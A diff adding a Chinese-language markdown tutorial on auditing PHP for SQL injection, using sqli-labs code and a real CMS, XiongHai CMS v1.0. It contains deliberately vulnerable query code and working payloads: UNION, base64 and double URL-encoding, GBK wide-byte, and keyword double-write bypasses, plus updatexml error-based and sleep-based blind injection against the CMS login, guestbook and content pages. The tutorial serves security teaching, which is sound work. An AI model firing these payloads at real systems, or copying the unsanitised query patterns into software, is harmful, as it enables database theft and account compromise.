|
| 1 | +<!-- TOC -->autoauto- [0x00 简介](#0x00-简介)auto- [0x01 字符型注入](#0x01-字符型注入)auto- [0x02 编码类注入](#0x02-编码类注入)auto- [0x03 宽字节注入](#0x03-宽字节注入)auto- [0x04 过滤](#0x04-过滤)auto- [0x05 实战审计](#0x05-实战审计)autoauto<!-- /TOC --> |
| 2 | +# 0x00 简介 |
| 3 | + |
| 4 | +为什么第一章我们学习,因为看这篇文章的朋友大概也看过我前面写的MySQL_wiki系列,这里来SQL注入的话我们能方便理解,同时sql注入也是审计中我们经常想要找到的,比较以来就getshell什么的也不现实这种漏洞也不多。 |
| 5 | + |
| 6 | +# 0x01 字符型注入 |
| 7 | + |
| 8 | +这里我们看到sqli-libs第一关的代码 |
| 9 | + |
| 10 | +``` |
| 11 | +<?php |
| 12 | +//including the Mysql connect parameters. |
| 13 | +include("../sql-connections/sql-connect.php"); |
| 14 | +error_reporting(0); |
| 15 | +// take the variables |
| 16 | +if(isset($_GET['id'])) |
| 17 | +{ |
| 18 | +$id=$_GET['id']; |
| 19 | +//logging the connection parameters to a file for analysis. |
| 20 | +$fp=fopen('result.txt','a'); |
| 21 | +fwrite($fp,'ID:'.$id."\n"); |
| 22 | +fclose($fp); |
| 23 | +// connectivity |
| 24 | +$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
| 25 | +$result=mysql_query($sql); |
| 26 | +$row = mysql_fetch_array($result); |
| 27 | +
|
| 28 | + if($row) |
| 29 | + { |
| 30 | + echo "<font size='5' color= '#99FF00'>"; |
| 31 | + echo 'Your Login name:'. $row['username']; |
| 32 | + echo "<br>"; |
| 33 | + echo 'Your Password:' .$row['password']; |
| 34 | + echo "</font>"; |
| 35 | + } |
| 36 | + else |
| 37 | + { |
| 38 | + echo '<font color= "#FFFF00">'; |
| 39 | + print_r(mysql_error()); |
| 40 | + echo "</font>"; |
| 41 | + } |
| 42 | +} |
| 43 | + else { echo "Please input the ID as parameter with numeric value";} |
| 44 | +?> |
| 45 | +
|
| 46 | +``` |
| 47 | +我们可以看到调用`$_GET['id']`获取参数内容,没有经过任何过来带入了SQL语句的查询,也就是代码没有任何过来且没开魔术引号,那么将会形成注入,如果开启魔术引号遇到数字型的我们还是能够注入的,因为`magic_quotes_gpc`只会转义单引号、双引号、反斜线、NULL,但是数字型注入我们可以不试用到这些。 |
| 48 | + |
| 49 | +``` |
| 50 | +http://127.0.0.1/sqli/Less-1/?id=-1%27union%20select%201,user(),3--%20+ |
| 51 | +
|
| 52 | +``` |
| 53 | + |
| 54 | +# 0x02 编码类注入 |
| 55 | + |
| 56 | +有些为了业务需要他会把传入一些编码后的参数再解码带入数据库查询,我们常见的有base64编码,也有的程序会内置url解码,这类写法通常见于框架。 |
| 57 | + |
| 58 | +1.base64 |
| 59 | + |
| 60 | +``` |
| 61 | +<?php |
| 62 | +include("../sql-connections/sql-connect.php"); |
| 63 | +$id=base64_decode($_GET['id']); |
| 64 | +$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
| 65 | +$result=mysql_query($sql); |
| 66 | +$row = mysql_fetch_array($result); |
| 67 | + |
| 68 | +if ($row) { |
| 69 | + echo "id:".$row['id']."<br>"; |
| 70 | + echo "用户名:".$row['username']."<br>"; |
| 71 | + echo "密码:".$row['password']."<br>"; |
| 72 | +}else{ |
| 73 | + print_r(mysql_error()); |
| 74 | +} |
| 75 | +echo '<hr>'; |
| 76 | +echo "查询的语句是:$sql"; |
| 77 | +?> |
| 78 | +
|
| 79 | +``` |
| 80 | +传入的值base64解密后带入查询,这种注入魔术引号是没办法拦截的,当我们遇到网站为base64编码的参数时可以留意下。 |
| 81 | + |
| 82 | +``` |
| 83 | +http://127.0.0.1/sqli/Less-1/base64.php?id=JyB1bmlvbiBzZWxlY3QgMSx1c2VyKCksMyAtLSAr |
| 84 | +
|
| 85 | +``` |
| 86 | +2.urldecode |
| 87 | + |
| 88 | +``` |
| 89 | +<?php |
| 90 | +include("../sql-connections/sql-connect.php"); |
| 91 | +$id=urldecode($_GET['id']); |
| 92 | +$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
| 93 | +$result=mysql_query($sql); |
| 94 | +$row = mysql_fetch_array($result); |
| 95 | + |
| 96 | +if ($row) { |
| 97 | + echo "id:".$row['id']."<br>"; |
| 98 | + echo "用户名:".$row['username']."<br>"; |
| 99 | + echo "密码:".$row['password']."<br>"; |
| 100 | +}else{ |
| 101 | + print_r(mysql_error()); |
| 102 | +} |
| 103 | +echo '<hr>'; |
| 104 | +echo "查询的语句是:$sql"; |
| 105 | +?> |
| 106 | +
|
| 107 | +``` |
| 108 | +因为接受的参数只会被url解码一次,传入的值不是魔术引号认识的值所以可以绕过 |
| 109 | + |
| 110 | +``` |
| 111 | +http://127.0.0.1/sqli/Less-1/base64.php?id=%2527union%20select%201,user(),3--%20+ |
| 112 | +
|
| 113 | +``` |
| 114 | + |
| 115 | +# 0x03 宽字节注入 |
| 116 | + |
| 117 | +``` |
| 118 | +<?php |
| 119 | +$conn = mysql_connect('localhost', 'root', 'root'); |
| 120 | +mysql_select_db("security",$conn); |
| 121 | +mysql_query("set names 'gbk' ",$conn); |
| 122 | +$id=urldecode($_GET['id']); |
| 123 | +$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; |
| 124 | +$result=mysql_query($sql); |
| 125 | +$row = mysql_fetch_array($result); |
| 126 | + |
| 127 | +if ($row) { |
| 128 | + echo "id:".$row['id']."<br>"; |
| 129 | + echo "用户名:".$row['username']."<br>"; |
| 130 | + echo "密码:".$row['password']."<br>"; |
| 131 | +}else{ |
| 132 | + print_r(mysql_error()); |
| 133 | +} |
| 134 | +echo '<hr>'; |
| 135 | +echo "查询的语句是:$sql"; |
| 136 | +?> |
| 137 | +
|
| 138 | +``` |
| 139 | +网上有很多解释大家可以搜索一下我这里就不详细介绍了大概原因就是: |
| 140 | + |
| 141 | +id=1'->id=1\'->id=1%5c%27 |
| 142 | + |
| 143 | +id=1%df'->id=1%df%5c%27->id=1%DF5C%27->id=1運' |
| 144 | + |
| 145 | + |
| 146 | +当然还有其他各种类型的注入这里就不一一列举了,看了mysql系列文章的大概都知道,不知道的可以看看。 |
| 147 | + |
| 148 | +# 0x04 过滤 |
| 149 | + |
| 150 | +通常情况下一个成熟的cms是不存在不过滤的情况,一般的程序选择用函数来过滤比如`addslashes()`,也可以开启魔术引号,但是更多的程序它采用正则匹配来过滤, |
| 151 | +使用不正确的匹配替换方式反而导致被绕过的机会更大,比如有的程序把`union` 替换为空,那么我们就可以双写`ununionion`绕过从而还可能绕过外部WAF,对于整数型一般采用`intval()`等字符转换,后期通过实战一步一步讲解。 |
| 152 | + |
| 153 | +# 0x05 实战审计 |
| 154 | + |
| 155 | +找了半天源码,还是用这款熊海CMS V1.0吧,这款CMS感觉不错,什么洞都有,非常适合我们学习审计,同时审计这个cms的文章很多,大家如果觉得我写的不如人意,还能看看别人。 |
| 156 | + |
| 157 | +首先我们审计对传入的参数如果想快速的看是否有全局过滤,不妨找个文件输出一下`$_POST`、`$_GET`等等。 |
| 158 | + |
| 159 | +``` |
| 160 | +echo $_POST['b']; |
| 161 | +echo $_GET['a']; |
| 162 | +
|
| 163 | +``` |
| 164 | + |
| 165 | + |
| 166 | + |
| 167 | +没有全局过滤 我们来到后台登陆文件admin/files/login.php 看看login.php一般登陆存在注入的可能性还是很大的 |
| 168 | + |
| 169 | + |
| 170 | + |
| 171 | +很明显 带入查询的user没有经过任何过滤,同时输出了错误,所以可以用报错查询,当然你也选择万能密码。 |
| 172 | + |
| 173 | +payload: |
| 174 | + |
| 175 | +``` |
| 176 | +user=1111' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- +&password=111&login=yes |
| 177 | +
|
| 178 | +``` |
| 179 | + |
| 180 | + |
| 181 | + |
| 182 | +在看看留言板 files/submit.php |
| 183 | + |
| 184 | + |
| 185 | + |
| 186 | +传入参数没有过滤 |
| 187 | + |
| 188 | + |
| 189 | + |
| 190 | +同时插入的时候,这里使用了`mysql_error()`所以可以用报错注入,否则只能使用盲注了。 |
| 191 | + |
| 192 | + |
| 193 | + |
| 194 | +payload: |
| 195 | + |
| 196 | +``` |
| 197 | +cid=0&name='or updatexml(1,concat(0x7e,(version())),0) or'&mail=1111&url=http%3A%2F%2F1&content=%E9%98%BF%E5%BE%B7&save=%E6%8F%90%E4%BA%A4&randcode=&jz=1&tz=1 |
| 198 | +``` |
| 199 | + |
| 200 | +开始我们说过不是使用了过滤函数就万事大吉了,数字型注入可以不使用引号 |
| 201 | + |
| 202 | + |
| 203 | + |
| 204 | +我们看到传入的`cid`已经被`addslashes()`函数转义了,查询的地方都没啥问题,但是到浏览计数的时候调用了它,那么我们就可以使用盲注或者报错注入了,因为有错误回显。 |
| 205 | + |
| 206 | +payload: |
| 207 | + |
| 208 | +``` |
| 209 | +http://127.0.0.1/xhcms/?r=content&cid=1%20and%20If(ascii(substr(database(),1,1))%3C10,0,sleep(10)) |
| 210 | +
|
| 211 | +``` |
| 212 | + |
| 213 | +这个系统还有其他注入,想练手的自己下载审计一下,总体思路有用户交互的地方都有可能存在注入,这也是我们没有通读代码的一个审计思路。 |
| 214 | + |
0 commit comments